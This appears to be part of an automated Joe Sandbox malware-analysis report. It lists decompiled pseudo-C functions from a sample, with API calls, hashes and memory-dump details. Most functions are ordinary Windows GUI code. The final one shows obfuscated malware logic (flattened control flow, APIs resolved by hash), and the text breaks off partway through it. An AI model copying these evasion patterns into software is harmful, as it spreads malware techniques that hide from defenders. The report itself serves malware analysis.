lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
wsprintfA.USER32 ref: 0042202D

Strings

:%d, xrefs: 00421F96, 00422019
- , xrefs: 00421FB9, 00421FF7

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415B0F, Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00416528(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00404F6B(E00404F00(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00404DAE();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00404F6B(E00404F00(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(?), ref: 00415B3A
SendMessageA.USER32 ref: 00415B5D
GetWindowRect.USER32 ref: 00415B76
GetWindowLongA.USER32 ref: 00415B89
CopyRect.USER32 ref: 00415BD6
CopyRect.USER32 ref: 00415BE0
GetWindowRect.USER32 ref: 00415BE9
CopyRect.USER32 ref: 00415C05

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00428D7F, Relevance: 19.6, APIs: 13, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00428D7F(intOrPtr* __ecx) {
				struct tagSIZE _v12;
				int _v16;
				struct tagSIZE _v24;
				void* _v28;
				int _v32;
				struct tagLOGFONTA _v92;
				struct tagTEXTMETRICA _v148;
				void* _t64;
				long _t70;
				void* _t79;
				signed int _t83;
				signed int _t84;
				void* _t91;
				int _t117;
				void* _t119;
				void** _t122;

				_t121 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t64 =  *(__ecx + 0x2c);
					if(_t64 == 0) {
						_push(0xe);
						return  *((intOrPtr*)( *__ecx + 0x24))();
					}
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						GetObjectA(_t64, 0x3c,  &_v92);
						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
						GetTextMetricsA( *(__ecx + 8),  &_v148);
						_t70 = _v148.tmHeight;
						if(_t70 >= 0) {
							_v92.lfHeight = _v148.tmInternalLeading - _t70;
						} else {
							_v92.lfHeight = _t70;
						}
						_v92.lfWidth = _v148.tmAveCharWidth;
						_v92.lfWeight = _v148.tmWeight;
						_v92.lfItalic = _v148.tmItalic;
						_v92.lfUnderline = _v148.tmUnderlined;
						_v92.lfStrikeOut = _v148.tmStruckOut;
						_v92.lfCharSet = _v148.tmCharSet;
						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
						_t79 = CreateFontIndirectA( &_v92);
						_v28 = _t79;
						SelectObject( *(_t121 + 4), _t79);
						GetTextMetricsA( *(_t121 + 4),  &_v148);
						_t83 = _v148.tmHeight;
						_t117 =  ~(_v92.lfHeight);
						if(_t83 >= 0) {
							_t84 = _t83 - _v148.tmInternalLeading;
						} else {
							_t84 =  ~_t83;
						}
						_v16 = _t84;
						GetWindowExtEx( *(_t121 + 4),  &_v12);
						GetViewportExtEx( *(_t121 + 4),  &_v24);
						if(_v12.cy < 0) {
							_v12.cy =  ~(_v12.cy);
						}
						if(_v24.cy < 0) {
							_v24.cy =  ~(_v24.cy);
						}
						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
							_t119 = _v28;
						} else {
							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
							_t119 = CreateFontIndirectA( &_v92);
							SelectObject( *(_t121 + 4), _t119);
							DeleteObject(_v28);
						}
						_t122 = _t121 + 0x28;
						_t91 = E0041A89B(_t122);
						 *_t122 = _t119;
						return _t91;
					}
				}
				return _t64;
			}

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
CreateFontIndirectA.GDI32(?), ref: 00428E30
SelectObject.GDI32(00000000,00000000), ref: 00428E39
GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
CreateFontIndirectA.GDI32(?), ref: 00428ED8

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00422E02, Relevance: 18.3, APIs: 12, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed char _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v112;
				intOrPtr _t141;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t150;
				signed int _t151;
				void* _t161;
				int _t177;
				void* _t184;
				signed int _t188;
				void* _t190;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed int _t205;
				int _t206;
				void* _t219;
				intOrPtr _t238;
				intOrPtr _t241;
				int _t243;
				signed int _t245;
				signed int _t246;
				int _t251;

				_t241 = __ecx;
				_v16 = __ecx;
				_v8 = E00416528(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v44);
				_t205 = GetSystemMetrics(0x21);
				_v12 = _t205;
				_v28 = GetSystemMetrics(0x20);
				if( *0x439c44 != 0) {
					_t177 = E004136A7(_t241);
					_t251 = _t177;
					_t243 = 2;
					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
						L6:
						if(_t251 < 0xa || _t251 > 0x11) {
							if(_t251 != 4) {
								goto L17;
							}
							goto L9;
						} else {
							L9:
							if((_v7 & 0x00000008) == 0) {
								InflateRect( &_v44,  ~_v28,  ~_t205);
								if((_v7 & 0x00000002) == 0) {
									L17:
									return _t251;
								}
								_t184 = _t251 - 4;
								if(_t184 == 0) {
									L22:
									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
									L23:
									return _t188 + 0xb;
								}
								_t190 = _t184 - 9;
								if(_t190 == 0) {
									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
									L19:
									return _t194 + 0xa;
								}
								_t196 = _t190 - 1;
								if(_t196 == 0) {
									_t188 = 0 | _a8 - _v44.top < 0x00000000;
									goto L23;
								}
								_t198 = _t196 - _t243;
								if(_t198 == 0) {
									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
									goto L19;
								}
								if(_t198 == 1) {
									goto L22;
								}
								goto L17;
							}
							return _t243;
						}
					} else {
						if(_t251 == 3) {
							_t251 = _t243;
						}
						if(GetKeyState(_t243) < 0) {
							L25:
							return 0;
						} else {
							goto L6;
						}
					}
				}
				_push(_a8);
				if(PtInRect( &_v44, _a4.x) == 0) {
					goto L25;
				}
				_t206 = GetSystemMetrics(6);
				_v20 = _t206;
				_t245 = GetSystemMetrics(5);
				_v112.top = _v44.top;
				_v112.left = _v44.left;
				_v112.bottom = _v44.bottom;
				_v112.right = _v44.right;
				_push( &_v112);
				E00422D9C(0);
				CopyRect( &_v60,  &_v112);
				_push(_a8);
				if(PtInRect( &_v60, _a4.x) != 0) {
					_push(1);
					L61:
					_pop(_t144);
					return _t144;
				}
				if((_v8 & 0x00040600) == 0) {
					L56:
					_t141 =  *0x439c9c; // 0x0
					_push(_a8);
					_v44.bottom = _t206 + _t141 + _v44.top;
					if(PtInRect( &_v44, _a4.x) == 0) {
						_push(0xfffffffe);
						goto L61;
					}
					_t145 =  *0x439c98; // 0x0
					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
						L54:
						_push(2);
					} else {
						_push(3);
					}
					goto L61;
				}
				_t246 = _v12;
				_t148 =  *0x439c98; // 0x0
				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
				if(_a8 >= _v44.top + _t246) {
					_t238 = _v44.bottom;
					if(_a8 < _t238 - _t246) {
						_t151 = _v28;
						if(_a4.x >= _v44.left + _t151) {
							if(_a4.x < _v44.right - _t151) {
								InflateRect( &_v44,  ~_t151,  ~_v12);
								_t206 = _v20;
								goto L56;
							}
							if((_v7 & 0x00000002) == 0) {
								if(_a8 > _v44.top + _t219) {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
								} else {
									_push(0xe);
									goto L51;
								}
							} else {
								_push(0xb);
								goto L51;
							}
						} else {
							if((_v7 & 0x00000002) == 0) {
								if(_a8 <= _v44.top + _t219) {
									goto L33;
								} else {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
								}
							} else {
								_push(0xa);
								goto L51;
							}
						}
					} else {
						if((_v7 & 0x00000002) == 0) {
							if(_a4.x > _v44.left + _t150) {
								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
							} else {
								_push(0x10);
								goto L51;
							}
						} else {
							_push(0xf);
							goto L51;
						}
					}
				} else {
					if((_v7 & 0x00000002) == 0) {
						if(_a4.x > _v44.left + _t150) {
							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
						} else {
							L33:
							_push(0xd);
							goto L51;
						}
					} else {
						_push(0xc);
						L51:
						_pop(_t161);
					}
				}
				if((_v7 & 0x00000008) != 0) {
					goto L54;
				}
				return _t161;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetWindowRect.USER32 ref: 00422E1F
GetSystemMetrics.USER32 ref: 00422E2D
GetSystemMetrics.USER32 ref: 00422E36
GetKeyState.USER32(00000002), ref: 00422E6B
InflateRect.USER32(?,?,00000000), ref: 00422EA3
PtInRect.USER32(?,?,?), ref: 00422F27

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411E32, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411E32(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t90;
				struct HWND__* _t91;
				intOrPtr* _t142;
				intOrPtr* _t145;
				void* _t147;
				void* _t149;

				_t118 = __ecx;
				E00406520(E00429CDC, _t147);
				_t145 = __ecx;
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
				if( *(_t147 + 0x10) == 0) {
					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
				}
				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
				 *(_t147 - 0x14) = 0;
				 *(_t147 - 0x18) = 0;
				 *(_t147 - 4) = 0;
				E0041615D(_t118, 0x10);
				E0041615D(_t118, 0x3c000);
				if(_t142 == 0) {
					L5:
					if( *(_t147 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return 0;
					}
					_t81 =  *0x436980; // 0x436994
					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
					 *(_t147 - 4) = 1;
					 *((intOrPtr*)(_t147 - 0x20)) = 0;
					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
						L13:
						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
						 *(_t147 - 4) = 2;
						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
						 *(_t147 - 4) = 1;
						E00416E3C(_t147 - 0x40);
						if( *(_t147 - 0x14) != 0) {
							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
						}
						L15:
						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
						_push(_t145);
						"VWh\rDB"();
						_t90 =  *((intOrPtr*)(_t147 + 0xc));
						if(_t90 != 0) {
							_t91 =  *(_t90 + 0x1c);
						} else {
							_t91 = 0;
						}
						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
						 *(_t147 - 4) = 0;
						E00416AEC(_t147 - 0x1c);
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						if(_t142 != 0) {
							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
							if( *(_t147 - 0x18) != 0) {
								 *((intOrPtr*)( *_t145 + 0xb4))(0);
							}
						}
						if(E00413C3E() == 0) {
							 *((intOrPtr*)( *_t145 + 0xa4))();
						}
						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t147 - 0x18));
							 *(_t147 - 0x18) = 0;
						}
						if( *(_t147 - 0x14) != 0) {
							GlobalUnlock( *(_t147 - 0x14));
							GlobalFree( *(_t147 - 0x14));
						}
						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t147 - 0x20)) == 8) {
							 *((intOrPtr*)(_t147 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t147 - 0x34);
				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
				goto L5;
			}

APIs

__EH_prolog.LIBCMT ref: 00411E37
GetSystemMetrics.USER32 ref: 00411EE9
GlobalLock.KERNEL32 ref: 00411F73
CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
GlobalFree.KERNEL32 ref: 00412036

Strings

MS Shell Dlg, xrefs: 00411EF7
Helv, xrefs: 00411F1D
MS Sans Serif, xrefs: 00411F0A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 022C9FA0, Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E022C9FA0(char* __ecx, intOrPtr __edx) {
				char _v524;
				char _v1044;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				intOrPtr* _v1068;
				intOrPtr _v1072;
				char* _v1076;
				intOrPtr _v1080;
				intOrPtr* _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1108;
				intOrPtr _v1112;
				void* __ebx;
				void* __ebp;
				void* _t39;
				signed int _t40;
				intOrPtr* _t43;
				signed int _t46;
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr* _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t97;
				intOrPtr _t98;
				char* _t99;
				intOrPtr _t100;
				intOrPtr _t134;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				char* _t152;
				void* _t153;
				char _t155;
				intOrPtr _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t99 = __ecx;
				_t157 =  &_v1084;
				_v1080 = __edx;
				_v1076 = __ecx;
				_t39 = 0x1a29c84b;
				while(1) {
					L1:
					_t97 = _v1068;
					while(1) {
						_t155 = _v1064;
						do {
							while(1) {
								L3:
								_t158 = _t39 - 0x1bec2acf;
								if(_t158 > 0) {
									break;
								}
								if(_t158 == 0) {
									_t56 =  *0x22cdea8;
									__eflags = _t56;
									if(_t56 == 0) {
										_t99 = E022C3F20(0xbb398380);
										_t56 = E022C3E80(_t97, _t99, 0x97f883e, _t155);
										 *0x22cdea8 = _t56;
									}
									_t146 =  *_t56();
									_t58 =  *0x22ce1a0;
									__eflags = _t58;
									if(_t58 == 0) {
										_t99 = E022C3F20(0xbb398380);
										_t58 = E022C3E80(_t97, _t99, 0x26c3f343, _t155);
										 *0x22ce1a0 = _t58;
									}
									 *_t58(_t146, 0, _t97);
									_t147 = _v1088;
									_t39 = 0x1dedf83c;
									continue;
								} else {
									_t159 = _t39 - 0x191840a9;
									if(_t159 > 0) {
										__eflags = _t39 - 0x1a29c84b;
										if(_t39 == 0x1a29c84b) {
											_t62 =  *0x22cdea8;
											__eflags = _t62;
											if(_t62 == 0) {
												_t99 = E022C3F20(0xbb398380);
												_t62 = E022C3E80(_t97, _t99, 0x97f883e, _t155);
												 *0x22cdea8 = _t62;
											}
											_t148 =  *_t62();
											_t64 =  *0x22cdcec;
											__eflags = _t64;
											if(_t64 == 0) {
												_t99 = E022C3F20(0xbb398380);
												_t64 = E022C3E80(_t97, _t99, 0xe9233692, _t155);
												 *0x22cdcec = _t64;
											}
											_t65 =  *_t64(_t148, 8, 0x48);
											_v1084 = _t65;
											__eflags = _t65;
											if(_t65 == 0) {
												return _t65;
											} else {
												_t147 = _v1088;
												_t39 = 0x1fc710ef;
												continue;
											}
										} else {
											__eflags = _t39 - 0x1a44b2a5;
											if(_t39 != 0x1a44b2a5) {
												goto L45;
											} else {
												_t152 = E022C34C0(0x22cda50);
												_t69 =  *0x22cdc60;
												__eflags = _t69;
												if(_t69 == 0) {
													_t69 = E022C3E80(_t97, E022C3F20(0xe66945e6), 0xcca28b0d, _t155);
													 *0x22cdc60 = _t69;
												}
												 *_t69( &_v1044, 0x104, _t152,  &_v524, _t97);
												_t157 = _t157 + 0x14;
												_t99 = _t152;
												E022C3460(_t99);
												_t147 = _v1076;
												_t39 = 0x10f8a433;
												continue;
											}
										}
									} else {
										if(_t159 == 0) {
											_t100 = _v1072;
											 *((intOrPtr*)(_t100 + 0x24)) = _t147;
											_t73 =  *0x22ce2dc; // 0x0
											 *((intOrPtr*)(_t100 + 0x20)) = _t73;
											 *0x22ce2dc = _t100;
											return _t73;
										} else {
											if(_t39 == 0xa70e03e) {
												_t74 =  *0x22cdc70;
												__eflags = _t74;
												if(_t74 == 0) {
													_t99 = E022C3F20(0xbb398380);
													_t74 = E022C3E80(_t97, _t99, 0x560d239b, _t155);
													 *0x22cdc70 = _t74;
												}
												 *_t74(_v1056);
												_t39 = 0x191840a9;
												continue;
											} else {
												if(_t39 == 0x10f8a433) {
													_push(0);
													_push(_t99);
													_t99 = 0;
													E022C4BA0(_t97, 0,  &_v1044, _t155, 1);
													_t157 = _t157 + 0xc;
													_t39 = 0x1bec2acf;
													continue;
												} else {
													if(_t39 != 0x18d473c5) {
														goto L45;
													} else {
														_t149 =  *0x22ce2ec; // 0x7720d0
														_t78 =  *0x22ce024;
														_t150 = _t149 + 0x278;
														_v1052 = _t150;
														if(_t78 == 0) {
															_t99 = E022C3F20(0xbb398380);
															_t78 = E022C3E80(_t97, _t99, 0x5262aefc, _t155);
															 *0x22ce024 = _t78;
														}
														_t79 =  *_t78(_t150);
														_t151 =  *0x22cded0;
														_v1052 = 2 + _t79 * 2;
														if(_t151 == 0) {
															_t99 = E022C3F20(0xbb398380);
															_t151 = E022C3E80(_t97, _t99, 0x23563937, _t155);
															 *0x22cded0 = _t151;
														}
														_t156 = _t151;
														if(_t151 == 0) {
															_t99 = E022C3F20(0xbb398380);
															_t151 = E022C3E80(_t97, _t99, 0x23563937, _t156);
															 *0x22cded0 = _t151;
														}
														_t98 = _t151;
														if(_t151 == 0) {
															_t99 = E022C3F20(0xbb398380);
															 *0x22cded0 = E022C3E80(_t98, _t99, 0x23563937, _t156);
														}
														_t144 =  *0x22cdce8; // 0x0
														if(_t144 == 0) {
															_t99 = E022C3F20(0xbb398380);
															_t144 = E022C3E80(_t98, _t99, 0xb310a228, _t156);
															 *0x22cdce8 = _t144;
														}
														_t85 =  *_t144(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
														_t147 = _v1108;
														_t134 = _v1112;
														asm("sbb eax, eax");
														_t39 = ( ~_t85 & 0x069deb97) + 0x1f9eb481;
														goto L1;
													}
												}
											}
										}
									}
								}
								L60:
							}
							__eflags = _t39 - 0x1fc710ef;
							if(__eflags > 0) {
								__eflags = _t39 - 0x263ca018;
								if(_t39 == 0x263ca018) {
